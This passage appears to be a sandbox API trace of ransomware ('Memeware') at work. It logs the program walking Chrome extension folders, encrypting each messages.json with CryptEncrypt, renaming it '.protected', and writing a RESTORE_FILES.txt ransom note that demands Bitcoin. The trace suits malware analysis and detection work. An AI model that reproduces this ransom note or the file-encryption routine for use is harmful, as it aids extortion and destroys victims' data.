(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.protected")) returned 1 [0079.818] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.818] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.818] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\RESTORE_FILES.txt") returned 161 [0079.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.819] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.819] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.820] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.820] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.820] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.820] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.820] CloseHandle (hObject=0x164) returned 1 [0079.820] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.820] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0079.820] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0079.820] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0079.820] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0079.820] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0079.820] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl") returned 143 [0079.820] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0079.820] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0079.820] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\*") returned 145 [0079.820] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.821] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.821] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.821] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.821] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.821] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.821] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\.") returned 145 [0079.821] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.821] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.821] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.821] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.821] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.821] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.821] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.821] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\..") returned 146 [0079.821] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.821] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.821] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.821] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.821] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.821] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.821] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.821] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.821] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json") returned 157 [0079.821] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.821] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.821] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.821] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.822] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json") returned 157 [0079.822] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.822] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json") returned 157 [0079.822] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.822] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json") returned 157 [0079.822] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.822] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.823] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.823] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.823] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.823] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.823] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.823] CloseHandle (hObject=0x168) returned 1 [0079.824] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.protected") returned 167 [0079.824] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.protected")) returned 1 [0079.824] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.824] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.824] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\RESTORE_FILES.txt") returned 161 [0079.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.825] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.825] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.826] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.826] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.826] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.826] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.826] CloseHandle (hObject=0x164) returned 1 [0079.826] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.826] lstrcmpiW (lpString1="no", lpString2="Windows") returned -1 [0079.826] lstrcmpiW (lpString1="no", lpString2="Program Files") returned -1 [0079.826] lstrcmpiW (lpString1="no", lpString2="Program Files (x86)") returned -1 [0079.826] lstrcmpiW (lpString1="no", lpString2="$Recycle.bin") returned 1 [0079.826] lstrcmpiW (lpString1="no", lpString2="System Volume Information") returned -1 [0079.826] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no") returned 143 [0079.826] lstrcmpW (lpString1="no", lpString2=".") returned 1 [0079.826] lstrcmpW (lpString1="no", lpString2="..") returned 1 [0079.826] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\*") returned 145 [0079.826] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.827] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.827] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.827] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.827] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.827] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.827] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\.") returned 145 [0079.827] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.828] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.828] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.828] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.828] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.828] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.828] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.828] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\..") returned 146 [0079.828] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.828] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.828] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.828] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.828] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.828] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.828] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.828] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.828] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json") returned 157 [0079.828] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.828] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.828] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.828] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.828] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json") returned 157 [0079.829] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.829] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json") returned 157 [0079.829] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.829] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json") returned 157 [0079.829] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.829] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x9f, lpOverlapped=0x0) returned 1 [0079.829] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff61, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.829] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x9f, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x9f, lpOverlapped=0x0) returned 1 [0079.830] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.830] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.830] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.830] CloseHandle (hObject=0x168) returned 1 [0079.830] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.protected") returned 167 [0079.830] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js 